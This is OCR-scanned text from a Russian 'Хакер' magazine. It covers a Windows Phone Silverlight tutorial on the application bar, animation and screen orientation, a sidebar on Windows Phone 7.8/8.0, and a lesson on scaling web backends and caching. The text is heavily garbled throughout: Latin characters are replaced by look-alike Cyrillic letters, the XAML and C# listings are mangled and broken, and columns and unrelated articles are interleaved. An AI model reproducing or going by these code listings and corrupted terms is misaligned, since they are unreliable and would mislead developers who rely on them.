Б0 Кз\ѴѴіпсіоѵѵ 5 РЬопе\ѵ7.1\Ісопз\). Обрати внимание, надо исполь- 
зовать изображения из подкаталога багк. Перед тем какзаюзать 
в приложении, их надо добавить в решение. 

Следующим действием давай создадим приложение, которое 
кроме Ьаг'а будет иметь анимационный элемент. Таким образом, 
вместе с элементами управления мы рассмотрим возможности 
БіІѵегІідЫ в создании анимации. 

Чтобы добавить пустой бар, достаточно в ХАМЬфайле внутри 
тега <рЬопе:РЬопеАррІіса1іопРаде> написать: 

<р1юпе: Р1юпеАрр1іса1ііопРа§е. Арр1іса1ііопВаг> 

<зІпе11: АррІісаІііопВаг І5ѴІ5ІЫе="Тгие" 
ІзМепиЕпаЫесІ= ,, Тгие ,, > 

<!-- кол для добавления элементов--> 

</зІіе11 : Арр1іса1іопВаг> 

</р!іопе: РбопеА р р1іса1:іопРа§е. А р рІісаІііопВаг > 

Атрибут ізѴізіЫе отвечает за видимость бара, ізМепиЕпаЫеб — 
за его активность. Добавим две кнопки, нажатие на первую из ко- 
торых будет запускать анимацию, а нажатие на вторую — останав- 
ливать. Для добавления кнопок напиши такой код: 

<5Ііе11 :Арр1іса1ііопВагІсопВи1і1іоп х:Мате="Ьи - Е5'ЕагЕ" 
Тех'1:= ,, 5'1:аг'1: " ІсопЦгі ="/ ісопз/аррЬаг .Іігапзрогіі . ріаѵ . гезіі . 

рп§" С1іск="Ьи1:51:аг1:_С1іск ,, 4> 

<збе11 :Арр1іса1ііопВагІсопВи1і1іоп х : Мате^'ЬиІіРаизе" 
Тех1і="Раи5е" ІсопІ)гі="/ісопз/аррЬаг .Іігапзрогіі. раизе. 
гезі. рп§" С1іск="Ьи1=Раи5е_С1іск"/> 



</рап : РапогатаІ1:ет> 

<рап : РапогатаІ Ііет НеасІег="3"> 

</рап : РапогатаИіет> 

< /рагі : Рапогата > 

В итоге ты сможешь в виртуальном журнале «Хакер» листать 
страницы привычным способом. Наполнение страниц надо добав- 
лять внутрь тегов РапогатаІІет. Для экономии пространства я не 
стал приводить код в журнале, ты можешь посмотреть его в приме- 
ре на нашем диске. Страницы можно наполнять любыми объекта- 
ми, то есть каждая панель может иметь свою разметку (рис. 2). 

В чем разница между Ріѵоі и Рапогата? Объект Ріѵоі, в отличие 
от Рапогата, не обладает общим для всех страниц заголовком: 
если Рапогата позволяет переходить со страницы на страницу 
только последовательно (с текущей на следующую или предыду- 
щую), то с помощью Ріѵоі можно перейти на любую страницу, при- 
коснувшись к ее названию в списке вверху экрана (рис. 3). 

Пополнить библиотеку элементов управления можно, напри- 
мер, скачав и установив тулкит: зіІѵегІідЫ.сосІерІех.сот/геІеазез/ 
ѵіеѵѵ/52297 . Кстати, при изготовлении сэмплов для статьи мы 
пользовались этим тулкитом. 



Теперь опишем определенные нами события (две штуки) в виде 
кода на С#. Перейди в файл МаіпРаде.хатІ.сз и напиши два пока 
пустых обработчика событий: 

ргіѵаііе ѵоіеі Ь и1і51іаг1і СІіскС оЬіесІі зепсіег., ЕѵепІіАг^з е) 
ргіѵаііе ѵоіеі ЬиІіРаизе СПскСоЬпесЕ зепсіег, ЕѵепІіАг^з е) 

М- 

Можно было бы оставить их описание до момента реализации, 
но тогда прога бы не компилировалась, а ведь мы ведем разра- 
ботку через тестирование (ЮО) и поэтому всегда должны иметь 
рабочий билд. 

Кстати, бар не может содержать больше четырех кнопок, иначе 
приложение будет падать при запуске. 

Теперь настала пора создать объект, которым будем управлять. 
Пусть это будет слово «Хакер» (вообще-то мы хотели использовать 
название водки, кофе или хотя бы оператора связи, но вовремя 
вспомнили, что Бекмамбетов — не наш главный редактор). 

Итак, для создания объекта в файл разметки интерфейса 
внутрь очищенного тега СгісІ добавь такой код: 

<Тех1іВ1оск НогііопІіаІАІі^птепІі^'СепІіег" 

Маг^іп="125 , 298 , 133 , 306 м 
Мате^'НаскТехІі" Техі= ,, Хакер" 

Ѵегііса1А1і§птеп1і="Сеп1іег" Роп1іРаті1у="Агіа1" 
Гоп1і5І2е="8Ѳ"> 

</Тех1іВ1оск> 

Благодаря этому коду надпись «Хакер» разместится примерно 
в центре экрана, написана она будет шрифтом АгіаІ большого- 
пребольшого размера. Теперь воспользуемся функциональностью 
бара, чтобы добавить к нему пункты текстового меню, которое 
появляется после нажатия кнопки с многоточием, находящейся 
с правого края. Двух вполне достаточно. Они будут служить нам 
для изменения цвета шрифта. 

К описанию тега <рЬопе:РЬопеАррІ ісаііоп Раде.АррІісаііоп Ваг> 
после добавления кнопокдля включения пунктов меню напиши 
такой код: 
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< зМеІІ :Арр1іса1:іопВаг .МепиІ1:ет5> 

<з!іе11:Арр1іса1:іопВагМепиІ1:ет х:ІМате="Ьи1:1лІІіі1:е" 
Тех1:="1л1Ы1:е" С1іск="Ьи1:ЫІіі1:е_С1іск"/> 
<5Ііе11:Арр1іса1:іопВагМепиІ1:ет х:1Мате="Ьи1:(згееп" 
ТехІі^'Сігееп" С1іск="Ьи1:0ігееп_С1іск"/> 

</зІіе11 :Арр1іса1:іопВаг.МепиІ1:ет5> 

Перед тем как описывать обработчики нажатий пунктов меню, 
необходимо объявить присоединенное свойство — это позволит 
использовать свойства, которые не объявлены в текущем классе. 
Таким образом (см. листинг далее), хотя свойство РогедгоипсІ класса 
ТехіВІоск не поддерживаетзначений класса Соіогз, он использует 
присоединяемое свойство, названное нами ТехіСоІог, для реали- 
зации класса ЗоІісІСоІогВгизЬез. Который, в свою очередь, поддер- 
живаетзначения класса Соіогз, передавая корректные значения 
названий предопределенных цветов. В месте описания экземпляра 
класса ТехіВІоск (внутри одноименного тега) добавь такой код: 



РЕЦЕПТ 4. АНИМАЦИЯ 

Анимации в ЗіІѵегІідЫ задаются в коде, они представляют собой 
изменение свойств объектов с течением времени. Мы же (хотя 
нет, почему это мы? Это же я!) хотим, чтобы во время анимации 
надпись вращалась на 360 градусов по оси У. Если взглянуть 
на свойства экземпляра класса ТехіВІоск, то мы не обнаружим 
свойств для задания градусов вращения по определенной 
оси. Тем не менее, воспользовавшись присоединяемым свой- 
ством, мы сможем решить эту задачу. Таким образом, свойству 
Ргоіесііоп класса ТехіВІоск будут передаваться поддерживаемые 
им значения класса РІапеРго)ес1іоп. С помощью этого свойства 
к объекту класса ТехіВІоск будет добавлена возможность вра- 
щения. Для этого перед закрывающим тегом </Тех1В1оск> добавь: 

< ТехіВІоск. Ргодес1:іоп> 

<Р1апеРгодес1:іоп х: Мате="гоіУ"/> 

</Тех1:В1оск. Ргоіес1:іоп> 

В результате будет добавлено присоединяемое свойство под 
именем гоіУ, манипулируя значением которого можно вращать 
родительский объект по оси У. Теперь опишем собственно ани- 
мацию. Внутрь тега ЗгісІ добавь следующее описание: 

<СгісІ . Кезоигсез> 

<5іогуЬоагс1 х:ІМате="го1:аі:еУ"> 

<ОоиЬ1еАпіта1:іоп БіогуЬоагсІ . Таг^еіІМате^'гоІіУ" 

БіогуЬоагсІ . Таг^еІіРгорегІіу^'КоІіаІііопУ" 

Ргот="0" То="36Ѳ" Оига1:іоп= ,, 0:Ѳ: 5" /> 
</51:огуЬоагсІ> 
с/СгісІ . Кезоигсез> 

Здесь создается раскадровка под именем гоІаІеУ, она ссыла- 
ется на созданное нами свойство гоіУ, из которого для измене- 
ния берется параметр РоІаІіопУ (последний является дочерним 
параметром свойства Рго)ес1іоп). Затем мы указываем, в каких 
пределах изменять значение выбранного параметра, и послед- 
ним действием задаем длительность анимации. Кроме того, 
анимация объявляется как ресурс элемента ЗгісІ. 

Сейчас воспользуемся уже объявленными обработчиками со- 
бытий для запуска и остановки анимации (напомню, что мы их на- 
писали в файле МаіпРаде.хатІ.сз). В первом из них, служащем для 
запуска, напиши: гоІаІеУ.ВедіпП;, а во втором, который, соответ- 
ственно, служит для остановки, напиши: гоІаІеУ.РаизеП;. Протести- 
руй приложение, все должно работать, как и задумано (рис. 4). 



<ТехіВ1оск. Роге§гоипсІ> 

<Бо1ісІСо1огВги5Іі х: ІМате="Тех1:Со1ог" Со1ог="ЫІіі1:е ,І /> 
</ТехіВІоск. Роге§гоипс1> 

В итоге, кроме того что задали свойство, мы установили на- 
чальный цветтекста белым. Далее мы можем написать обработчи- 
ки нажатия на пункты меню: 



ргіѵаіе ѵоісі ЬиШіі~Ее_С1іск(оЬіес1: зепсіег. ЕѵепіАг^з е) 



1 ііііз . ТехіСоІог . Соіог = Соіогз .Іл/Иіііе : 


> 






ргіѵаііе ѵоісі Ьиібгееп С1іск(оЬіесі зепсіег. ЕѵепіАгдз е) 


ібіз. ТехіСоІог. Соіог = Соіогз .Сгееп; 


} 



В результате при нажатии на определенный пункт меню цвет 
шрифта будет соответствующим образом изменяться. 



а* 

В 

* 



Хакер 



ѳ © 



<Г Вв О 



Рис. 4. Все работает! 
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Расе ѴѴіпсІоѵѵз РЬопе 



МОБИЛЬНЫЕ ПРИЛОЖЕНИЯ ДОЛЖНЫ КРАСИВО РЕАГИРОВАТЬ НА 
ДАННЫЕ, ПОСТУПАЮЩИЕ С АКСЕЛЕРОМЕТРА. И ЭТО РЕАЛИЗУЕМО 

РЕЦЕПТ 5. ПРАВИЛЬНАЯ ОРИЕНТАЦИЯ 



Если сейчас (в смысле, во время работы нашей программы) на- 
клонить телефон, то слово «Хакер» не изменит своего положения. 
Непорядок! Мобильные приложения должны красиво реагировать 
на данные, поступающие с акселерометра, и для этого БіІѵегІідЫ 
(огѴѴР предоставляет нам все условия. 

Первым делом в начале файла МаіпРаде.хатІ в определении 
тега <рЬопе: РЬопеАррІ ісаііоп Раде> отредактируй определение 
атрибута БиррогІесЮгіепІаІіопз на такое: БиррогІесІ0пепІаІіоп5= 
"РогІгаіШгІ_апсІ5саре" ОгіепІаІіоп="РогІгаіГ. Это означает под- 
держку нашим приложением обеих ориентаций. В качестве 
дефолтной мы указали портретную ориентацию. Если сейчас во 
время проверки опрокинуть телефон, то кнопки на баре примут 
соответствующее положение, а надпись исчезнет. Оп-ля! Надо 
поправить ситуацию. Если, следуя моему совету, ты удалил все со- 
держимое тега ЗгісІ, то верни описание следующего атрибута: 

<СгісІ . Ко\лЮебпі1:іоп5> 

<КоыОебпі-біоп Н еі^ІтЕ="А іг Ьо ,, /> 

<Коіл/РебпгЕіоп Неі§ІтЬ="*"/> 

</Сг ісі . Коѵ\Юебпі1:іоп5> 




Рис. 5. С ориентацией проблем у нас нет 



В нем определяется содержимое сетки, в данном случае оно 
состоит из одной строки. Затем, ниже строчки определения 
ориентации приложения, зарегистрируй его на получение изве- 
щения о смене положения телефона: ОгіепІаІіопСЬапдесІ="РИопе 
ОгіепІаІіопСИапдесІ". Напишем обработчик этого события в коде 
на С#: 

ргіѵаііе ѵоісі Рбопе ОгіепІіаІііопСІзап^есК'оЫесІ: зепсіег., 
0гіеп1:а1:іопСІіап§есІЕѵеп1:Аг§5 е) 

і — 

і-р (Че.ОгіепІіаІііоп & Ра^еОгіепІіаІііоп. Ьапсізсаре) 

== (Ра§еОпіеп1:а1:іоп. І.апсІ5саре^И 

{ 

СгісІ .5е1:Коы(НаскТех1: л 0); 

СгісІ .5е1:Со1итп(НаскТех1: л 1)^ 

} еіве { 

Сгі^5е1:Ко\л/(НаскТех1:., 1); 
Зг ісІ.Зе ІіСоІитпСНаскТехІ:, 0); 

} 

} 

Вот теперь все работает! В зависимости от изменения поло- 
жения телефона сетка принимает теперь вид строки или столбца 
соответственно (рис. 5). 



ОРГВЫВОДЫ 

Под занавес статьи подытожим, чего мы добились и что узнали. 
Как и планировали вначале, мы узнали в теории и попробова- 
ли на практике некоторое количество дизайнерски-кодерских 
трюков для платформы \Л/Р, рассмотрев разные декоративные 
объекты и элементы управления. Кроме того, мы погрузились 
в язык ХАМ Ь, узнали об использовании простых анимаций, а с 
помощью присоединяемых свойств мы научились организовывать 
передачу объекту таких значений, которые изначально им не 
поддерживаются. До встречи на страницах журнала и удачи тебе 
во всех делах! ПЕ 



ѴѴШР0ѴѴ5 РНОЫЕ 7.8 И 8.0 



Пока писалась эта статья, на конференции ѴѴіпсіоѵѵз РИопе Битплі* 
МісгозоК представила две мобильных ОС — ѴѴіпсіоѵѵз РИопе 7.8 и 8.0. 
Первая — это масштабное обновление для существующих устройств 
на базе ѴѴіпсіоѵѵз РИопе 7.5, тогда как вторая — полноценная ОС, для 
работы с которой понадобится новое, более мощное устройство. Главной 
фишкой обновления станет расширенный по функциональности и более 
удобный в использовании стартовый экран. Например, в нем появилась 
возможность изменять размеры плиток. Мелочь, а приятно! Меня, 
например, раздражает, что на моем телефоне плитка календаря имеет 
больший размер, чем плитка игры РоІІіпдСаг :). 

С другой стороны, в ѴѴР 8.0 объявлено о появлении огромного 
количества нововведений, и вот некоторые из них. Во-первых, это 



общее с десктопной версией N1 ядро, что предвещает нам более легкий 
перенос приложений. Во-вторых, это возможность программировать 
в нативном коде на С/С++ и полноценная поддержка йігесІХ, что откроет 
новые горизонты перед разработчиками игр. В-третьих, это поддержка 
других фреймворков (таких, как РИузХ, Наѵок) и, будем надеяться, 
наконец настоящая многозадачность. Из других (аппаратных) новшеств 
стоит отметить: увеличенный до 1280 х 768 экран, поддержку более 
четырех ядер, поддержку ББ карт памяти, наличие связи на близком 
расстоянии — ІЧРС. 

Выход обеих операционок ожидается в середине осени, вместе 
с десктопной «Восьмеркой». Прямо ко дню рождения Билла — 

28 октября :). 
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Большая часть информации, 
опубликованная по теме высоких нагрузок 
в интернете, представляетсобой всего 
лишь описания технических характеристик 
крупныхсистем. Мы же попробуем изложить 
принципы, по которым строятся архитектуры 
самых передовых и самых посещаемых 
интернет-проектов нашего времени. 



АКАДЕМИЯ 



УРОК# 



Каждый программ ист хочет стать лучшим, 
получать все более интересные и сложные 
задачи и решать их все более эффективными 
способами. В мире интернет-разработок 
к та ким задачам можно отнести те, 
с которыми сталкиваются разработчики 
в ысокона груженных систем. 
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Учебник по высоким нагрузкам. Урок № 3 



МАСШТАБИРОВАНИЕ БЭКЕНДА 



■ Функциональное разделение 

- Классическое горизонтальное масштабирование 

+ Концепции 5 ІіагесІ МоІНіпд и Біаіеіезз 

■ Критика концепций БЬагесІ ІЧоіНіпд и Біаіеіезз 

■ Связность кода и данных 

■ Кеширование 

Н Проблема инвалидации кеша 

Ш Проблема старта с непрогретым кешем 

Начнем наш третий урок, посвященный бизнес-логике проекта. 
Это самая главная составляющая в обработке любо го за проса. 
Для таких вычислений требуются бакен ды — тяжелые серверы 
с большими вычислительными мощностями. Если фронтенд не 
может отдать клиенту что-то самостоятельно (а как мы выяснили 
в прошлом номере, он без проблем можем сам отдать, к при- 
меру, картинки), то он передает запрос дальше по цепочке — на 
бэкенд. На бэкенде отрабатывается бизнес-логика, то есть фор- 
мируются и обрабатываются данные, при этом данные хранятся 
в другом слое — сетевом хранилище, базе данных или файловой 
системе. Хранение данных — это тема следующего урока, а се- 
годня мы сосредоточимся на масштабировании бэкенда. 

Сразу предупредим: масштабирование вычисляющих бэкен- 
дов — одна из самых сложныхтем, в которой существует множе- 
ство мифов. Облачные вычисления решают проблему произво- 
дительности — уверены многие. Однако это верно не до конца: 
для того чтобы вам действительно могли помочь облачные сер- 
висы, вы должны правильно подготовить ваш программный код. 
Вы можете поднять сколько угодно серверов, скажем, в Атагоп 
ЕС2, но какой с них толк, если код не умеет использовать мощ- 
ности каждого из них. Итак, как масштабировать бэкенд? 

ФУНКЦИОНАЛЬНОЕ РАЗДЕЛЕНИЕ 

Самый первый и простой способ, с которым сталкиваются 
все, — это функциональное разбиение, при котором разные 
части системы, каждая из которых решает строго свою задачу, 
разносятся на отдельные физические серверы. Например, 
посещаемый форум выносится на один сервер, а все остальное 
работаетна другом. 

Несмотря на его простоту, о подобном подходе многиеза- 
быва ют. Например, мы очень часто встречаем веб- проекты, 
где используется только одна база Му5СІІ_ под совершенно 
различные типы данных. В одной базе лежат и статьи, и банне- 
ры, и статистика, хотя по-хорошему это должны быть разные 
экземпляры Му50І_. Если у вас есть функционально не связан- 
ные данные (как в этом примере), то их целесообразно разносить 
в разные экземпляры баз данных или даже физические серверы. 
Посмотрим на это с другой стороны. Если у вас есть водномпро- 
екте и встроенная интегрированная баннерокрутилка, и сервис, 
который показываетпосты пользователей, то разумное реше- 
ние — сразу осознать, что эти данные никак не связаны между 
собой и поэтому должны жить в самом простом варианте в двух 
разных за пуще иных Му5С1І_. Это относится и к вычисляющим бэ- 
кенда м — они тоже могут быть разными. С совершенно разными 
настройками, с разными используемыми технологиями и на- 
писанные на разных языках программирования. Возвращаясь 
к примеру: для показа постов вы можете использовать в каче- 
стве бэкенда самый обычный РНР, а для баннерной системы вы 
можете запустить модуль к пдіпх'у. Соответственно, для постов 
вы можете выделить сервер с большим количеством памяти (ну, 
РНР все-таки), при этом для баннерной системы память может 
быть не так важна, как процессорная емкость. 



Функциональное разделение 




Разные функцио- 
нальные части ра- 
ботают и хранятся 
на разных серве- 
рах системы. 



Сделаем выводы: функ- 
циональное разбиение бэкенда 
целесообразно использовать 
в качестве простейшего метода 
масштабирования. Группируйте 
сходные функции и запускайте их 
обработчики на разных физиче- 
ских серверах. Обратимся к сле- 
дующему подходу. 

КЛАССИЧЕСКОЕ 

ГОРИЗОНТАЛЬНОЕ 

МАСШТАБИРОВАНИЕ 

О том, что та кое горизонтальное 
масштабирование, в принципе, мы 
ужезнаем. Если вашей системе 
нехватаетмощности, вы просто 
добавляете еще десять серверов, 
и они продолжают работать. Но 
не каждый проект позволит про- 
вернутьтакое. Есть несколько 
классических парадигм, которые 
необходимо рассмотреть на ран- 
нем этапе проектирования, чтобы 
программный код можно было мас- 
штабировать при росте нагрузки. 



КОНЦЕПЦИИ БНАРЕБ МОТНІМС 
И 5ТАТЕ1Е55 

Рассмотрим две концепции — 
БНагеб ІМоіЫпд и БіаІеІе55, которые 
могут обеспечить возможность го- 
ризонтального масштабирования. 

ПодходБИагеб Ыо1:Ыпд означает, 
что каждыйузел является независи- 
мым, самодостаточным и неткакой- 
тоединойточки отказа. Это, конечно, 
невсегда возможно, новлюбом 
случае количество таких точек 
находится поджестким контролем 
архитектора. Подточкой отказа мы 
понимаем некие данные или вычис- 
ления, которыеявляются общими 
для всехбэкендов. Например, какой- 
нибудьдиспетчерсостояний или 
идентификаторов. Другой пример — 
использование сетевых файловых 
систем. Этопрямой путь получить на 
определенном этапе роста проекта 
узкое место в архитектуре. Если каж- 
дыйузел является независимым, 
томы легко можем добавить еще 
несколько — по росту нагрузки. 



Классическое горизонтальное 
масштабирование 

• ЗНагесІ ІМоіЫпд (каждый узел является 
независимым и самодостаточным, 

не существует единой точки отказа); 

• Зіаіеіезз (процесс не хранит состояние) 
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АКАДЕМИЯ 



ОТ АВТОРОВ 

Основным направлением деятельности нашей компании является 
решение проблем, связанныхс высокой нагрузкой, консультирование, 
проектирование масштабируемыхархитектур, проведение нагрузочных 
тестирований и оптимизация сайтов. В число наших клиентов входят 
инвесторы из России и со всего мира, а также проекты «ВКонтакте», 
«Эльдорадо», «Имхонет», РЬоІозідМ.ги и другие. Вовремя консультаций 
мы часто сталкиваемся с тем, что многие не знают самых основ — что та- 
кое масштабирование и каким оно бывает, какие инструменты и для чего 
используются. Эта публикация продолжает серию статей «Учебникпо 
высоким нагрузкам». Вэтихстатьяхмы постараемся последовательно 
рассказатьобо всехинструментах, которыеиспользуются при построе- 
нии архитектуры высоконагруженныхсистем. 



Концепция ЗШеІезз означает, что процесс программы не 
хранит свое состояние. Пользователь пришел и попал на этот 
конкретный сервер, и нетникакой разницы, попал пользова- 
тель на этот сервер или на другой. После того как запрос будет 
обработан, этот сервер полностью забудет информацию об этом 
пользователе. Пользователь вовсе не обязан все свои следую- 
щие запросы отправлять на этот же сервер, не должен второй раз 
приходить на негоже. Таким образом, мы можем динамически 
менять количество серверов и не заботиться о том, чтобы роу- 
тить пользователя на нужный сервак. 

Наверное, это одна из серьезных причин, почему веб так 
быстро развивается. В нем гораздо проще делать приложения, 
чем писать классические офлайновые программы. Концепция 
«ответ — запрос» и тот фа кт, что ваша программа живет 200 мил- 
лисекунд или максимум одну секунду (после чего она полностью 
уничтожается], привели к тому, что в таких распространенных 
языках программирования, как РНР, до сих пор нет сборщика 
мусора. 

Описанный подход является классическим: он простой 
и надежный, как скала. Однако в последнее времянамвсечаще 
и чаще приходится отказываться отнего. 

КРИТИКА КОНЦЕПЦИЙ 5НАКЕ0 Н0ТНШ6 И 5ТАТЕІ.Е55 

Сегодня перед вебом воз ни кают новые за дач и, которые ставят 
новые проблемы. Когда мы говорим про Зіаіеіезз, это означает, 
что каждые данные каждому пользователю мы заново тащим 
из хранилища, а это подчас бывает очень дорого. Воз ни кает ре- 
зонное желание положить какие-то данные в память, сделать не 
совсем 5іаІеІе55. Это связано с тем, что сегодня веб становится 
все более и более интерактивным. Если вчера человек заходил 
в веб-почту и нажимал на кнопку «РеІоасІ», чтобы проверить 
новые сообщения, то сегодня этим уже занимается сервер. Он 
ему говорит: «О, чувак, покаты сидел на этой страничке, тебе 
пришли новые сообщения». 

Возни кают новые за дач и, которые приводят к тому, что под- 
ход сБИагесІ РЫЫпд и отсутствием состояния в памяти иногда 
не является обязательным. Мы уже сталкивались неоднократно 
с ситуациями наших клиентов, которым мы говорим: «От этого 
откажитесь, положите данные в память» и наоборот «Направ- 
ляйте людей на один и тот же сервер». Например, когда возни- 
кает открытая чат- комната, людей имеет смысл роутить на один 
итотже сервер, чтобы это все работало быстрее. 

Расскажем про еще один случай, с которым сталкивались. Один 
нашзнакомый разрабатывал на РиЬуоп Раііз игрушку наподобие 
«Арены» (онлайн драки и бои). Вскоре после запуска он столкнулся 
с классической проблемой: если несколько человек находятся 
в рамкаходногобоя, каждый пользовательпостоянно вытаскивает 
из БД данные, которые во время этого боя возникли. В итоге вся эта 
конструкция смогла дожить только до 30 тысяч за регистрирова н- 
ныхюзеров,а дальшеона просто перестала работать. 



Обратная ситуация сложилась 
у компании Ѵида, которая занима- 
ется играми для РасеЬоок. Правда, 
когда они столкнулисьс похожей 
проблемой, у них были другие 
масштабы: несколько миллиардов 
ЗЕБЕСТ'ов из Роз1:дге5СІІ_ в день 
на одной системе. Они перешли 
полностью на подход Метогу Зіаіе: 
данные начали храниться и обслу- 
живаться прямо в оперативной 
памяти. Итог: ребята практически 
отказалисьотбазы данных, а пара 
сотен серверов оказались лишни- 
ми. Их просто выключили: они стали 
не нужны. 

В принципе, любое масштаби- 
рование (в том числе горизонталь- 
ное] достижимо на очень многих 
технологиях. Сейчас очень часто 
речь идет о том, чтобы при создании 
сервиса не пришлось платить 
слишком много за железо. Для это- 
го важно знать, какая технология 
наиболее соответствуетданному 
профилю нагрузки с минимальны- 
ми затратами железа. 

При этом очень часто, когда 
начина ют размышлять о масштаби- 
рован и и, то за бывают про финан- 
совый аспект того же горизонталь- 
ного масштабирования. Некоторые 
думают, что горизонтальное мас- 
штабирование — это реально пана- 
цея. Разнесли данные, все разбро- 
сали на отдельные серверы — и все 
стало нормально. Однако эти люди 
забывают о накладных расходах 
(оверхедах) — как финансовых (по- 
купка новых серверов), так и экс- 
плуатационных. Когда мы разносим 
все на компоненты, возникают 
накладные расходы на коммуни- 
кацию программных компонентов 
между собой. Грубо говоря, хопов 
становится больше. 

Вспомним уже знакомый тебе 
пример. Когда мы заходим на 
страничку РасеЬоок, мощный 
ЭаѵаЗсгірІ: идетна сервер, который 
долго-долго думает и только через 
некоторое время начинает отдавать 
вам ваши данные. Все наблюдали 



подобную картину: хочется уже 
посмотреть и бежать дальше пить 
кофе, а оно все грузится, грузится 
и грузится. Надо бы хранить данные 
чуть-чуть «поближе», но у РасеЬоок 
уже такой возможности нет. 

СЛОИСТОСТЬ КОДА 

Еще пара советов для упрощения 
горизонтального масштабирова- 
ния. Первая рекомендация: про- 
граммируйте так, чтобы ваш код 
состоял как бы из слоев и каждый 
слой отвечал за какой-то опреде- 
ленный процесс в цепочке об- 
работки данных. Скажем, если у вас 
идет работа с базой данных, то она 
должна осуществляться в одном 
месте, а не быть разбросанной 
по всем скриптам. К примеру, мы 
строим страницу пользователя. 

Все начинается с того, что ядро за- 
пускает модуль бизнес-логики для 
построения страницы пользовате- 
ля. Этот модуль запрашивает у ни- 
жележащего слоя хранения данных 
информацию об этом конкретном 
пользователе. Слою бизнес-логики 
ничего не известно о том, где лежат 
данные: за кешированы ли они, 
зашардированы ли (шардинг — это 
разнесение данных на разные 
серверы хранения данных, о чем 
мы будем говорить в будущих 
уроках], или с ними сделали еще 
что-нибудь нехорошее. Модуль 
просто запрашивает информацию, 
вызывая соответствующую функ- 
цию. Функция чтения информации 
о пользователе расположена 
в слое хранения данных. В свою 
очередь, слой хранения данных по 
типузапроса определяет, в каком 
именно хранилище хранится поль- 
зователь. В кеше? В базе данных? 

В файловой системе? И далее вы- 
зываетсоответствующую функцию 
нижележащего слоя. 

Что даеттакая слоистая схема? 
Она дает возможность переписы- 
вать, выкидывать или добавлять 
целые слои. Например, решили 
вы добавить кеширование для 



Классическое горизонтальное 
масштабирование 

• Слоистость кода; 

• Минимизация использования сложных 
запросов сразу к нескольким таблицам; 

• Низкая степень связности кода 
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пользователей. Сделать это в слоистой схеме очень просто: надо 
допилить только одно место — слой хранения данных. Или вы 
добавляете шардирование, и теперь пользователи могут лежать 
в разных базах данных. В обычной схеме вам придется перело- 
патить весь сайт и везде вставить соответствующие проверки. 

В слоистой схеме нужно лишь исправить логику одного слоя, 
одного конкретного модуля. 

СВЯЗНОСТЬ КОДА И ДАННЫХ 

Следующая важная задача, которую необходимо решить, чтобы 
избежать проблем при горизонтальном масштабировании, — 
минимизировать связность как кода, та к и данных. Например, 
если у вас в 501-запросах используются ООІІЧ'ы, у вас уже есть 
потенциальная проблема. Сделать .ЮІИ в рамках одной базы 
данных можно. А в рамках двух баз данных, разнесенных по раз- 
ным серверам, уже невозможно. Общая рекомендация: старай- 
тесь общаться с хранилищем минимально простыми запросами, 
итерациями, шагами. 

Что делать, если без .Ю11\Га не обойтись? Сделайте его сам и: 
сделали два запроса, перемножили в РНР — в этом нет ничего 
страшного. Для примера рассмотрим классическуюзадачу постро- 
ения френдленты. Вам нужно поднять всех друзей пользователя, 
для них за просить все последние записи, для всех записей собрать 
количество комментариев — вот где соблазн сделать это одним 
запросом (снекоторым количеством вложенных ЛЭІІЧ'ов) особенно 
велик. Всего один запрос — ивы получаете всю нужную вам инфор- 
мацию. Но что вы будете делать, когда пользователей и записей 
станет много и база да иных перестанет справляться? По-хорошему 
надо бы расшардить пользователей (разнести равномерно на 
разные серверы баз данных). Понятно, что в этом случае выполнить 
операцию .ЮІИ уже не получится: данные-то разделены по разным 
базам. Так что придется делать все вручную. Вывод очевиден: 
делайте это вручную с самого начала. Сначала запросите из базы 
данных всех друзей пользователя (первый запрос). Затем заберите 
последние записи этих пользователей (второй запрос или группа 
запросов). Затем в памяти произведите сортировку и выберите то, 
что вам нужно. Фактически вы выполняете операцию ООІЫ вручную. 
Да, возможно вы выполните ее не та к эффективно, как это сделала 



Кеширование 




Единый кеш 

для всех бэкендов; 

Проблема 

инвалидации кеша; 
Проблема старта 
с непрогретым кешем 



бы база данных. Но зато вы никак 
неограничены объемомэтой базы 
данных в хранении информации. Вы 
можете разделять и разноситьваши 
данные на разные серверы или даже 
вразныеСУБД! Всеэтосовсем не 
такстрашно, какможетпоказаться. 
В правильно построенной слои- 
стой системебольшая частьэтих 
запросов будет за кеширована. Они 
простые и легко кешируются — в от- 
личие от результатов выполнения 
операции -ЮІІЧ. Еще один минус 
варианта с -ЮІІЧ: при добавлении 
пользователем новой записи вам 
нужносброситькеши выбороквсех 
его друзей! А при таком раскладе 
неизвестно, что на самом деле будет 
работатьбыстрее. 



КЕШИРОВАНИЕ 

Следующий важный инструмент, 
с которым мы сегодня познако- 
мимся, — кеширование. Что такое 
кеш? Кеш — это такое место, куда 
можно под каким-то ключом по- 
ложить данные, которые долго 
вычисляют. Запомните один из 
важнейших моментов: кеш должен 
вам по этому ключу отдать данные 
быстрее, чем вычислить ихзаново. 
Мы неоднократно сталкивались 
с ситуацией, когда это было не 
так и люди бессмыслен но терял и 
время. Иногда база данных рабо- 
тает достаточно быстро и проще 
сходить напрямую к ней. 

Я думаю, не стоит говорить, 
что кеш должен быть единым для 



НІСНЮАО-ИНСТРУКТОРЫ 



Олег Бунин 

Известный 
специалист 
по НідЫоасІ- 
проектам. 

Его компания 
«Лаборатория 
Олега Бунина» 
специализиру- 
ется на консалтинге, разработке 
и тестировании высоконагру- 
женных веб- проектов. Сейчас 
является организатором конфе- 
ренции НіаЫ_оасІ++ ( ѵѵѵѵѵѵ.ЫаЫоасІ. 
ги). Это конференция, посвящен- 
ная высоким нагрузкам, которая 
ежегодно собирает лучших в мире 
специалистов по разработке 
крупных проектов. Благодаря этой 
конференции знаком со все ми 
ведущими специалистами мира 
вы соконагруженных систем. 



Константин Осипов 

Специалистпо 
базам данных, 
который долгое 
время работал 
в Му5(ЭІ_, где 
отвечал как раз 
за высоконагру- 
женный сектор. 
Быстрота Му5СІІ_ — в большой 
степени заслуга именно Кости 
Осипова. В свое время он зани- 
мался масштабируемостью Му50І_ 
5.5. Сейчас отвечает в МаіІ.Пи за 
кластерную Мо5СІІ_ базуданных 
Тагап^ооІ, которая обслуживает 
500-600 тысяч запросов в секунду. 
Использовать этот 0 реп Зои гее 
проект может лю бой желающий. 



МаксимЛапшин 

Решения для 
организации 
видеотрансляции, 
которые существу- 
ютвмиренадан- 
ный момент, можно 
пересчитатьпо 
пальцам. Макс 
разработал одно из них — Егіуѵібео 
(щ^ууібеожа)- Это серверное прило- 
жение, котороезанимается потоко- 
вым видео. При создании подобных 
инструментов возникаетцелая куча 
сложнейших проблем со скоростью. 

У Максима также есть некоторый 
опыт, связанный с масштабировани- 
ем средних сайтов (не таких крупных, 
